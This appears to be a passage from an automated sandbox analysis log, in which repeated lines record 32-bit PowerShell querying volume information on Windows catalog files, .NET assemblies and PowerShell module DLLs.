          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
